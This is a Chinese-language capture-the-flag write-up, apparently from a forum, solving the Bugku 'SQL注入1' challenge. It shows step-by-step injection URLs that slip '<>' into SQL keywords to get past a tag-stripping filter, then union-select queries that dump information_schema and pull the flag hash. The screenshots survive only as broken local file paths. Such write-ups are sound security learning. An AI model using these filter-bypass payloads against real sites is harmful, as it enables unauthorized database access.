SQL注入1Writeup

Bugku——SQL注入1（http://103.238.227.13:10087/）file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image.png

过滤了几乎所有的关键字，尝试绕过无果之后发现，下面有个xss过滤代码。经搜索得该函数会去掉所有的html标签，所以向注入关键字中插入<>，就可以不被检测到，并成功注入；
[size=0.875em]1.首先判断是否存在注入：http://103.238.227.13:10087/?id=1 a<>nd 1=1

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(1).png
http://103.238.227.13:10087/?id=1 a<>nd 1=2

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(2).png
通过这两次的返回结果可初步判断存在注入点。

2.判断字段大小：
http://103.238.227.13:10087/?id=1 o<>rder by 2

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(3).png
http://103.238.227.13:10087/?id=1 o<>rder by 3

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(4).png
根据返回结果可判断字段值为2
3.判断字段的输出位置；
http://103.238.227.13:10087/?id=1 a<>nd 1=2 uni<>on s<>elect 1,2

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(5).png
如图可发现字段内容的输出位置。
4.输出数据库的信息：

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(6).png
可见有一个额外数据库为sql3.
5.查询key表：
http://103.238.227.13:10087/?id=1 a<>nd 1=2 uni<>on s<>elect group_concat(tabl<>e_schema),group_concat(tabl<>e_name) fr<>om info<>rmation_schema.ta<>bles

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(7).png
仔细看输出的数据表的信息，发现因为group_concat()函数的长度限制原因无法打印出全部信息。如下：
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(8).png
至此，查询key表失败，未解决。
6.查到信息：
http://103.238.227.13:10087/?id=1 a<>nd 1=2 uni<>on s<>elect 1,hash fr<>om sql3.key

file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(9).png
语句中，前半部分SQL语句查询错误信息，后半部分查询我们需要的信息。
查到hash为 c3d3c17b4ca7f791f85e#$1cc72af274af4adef，即为flag。

顶一下子-。-

顶一个！！！！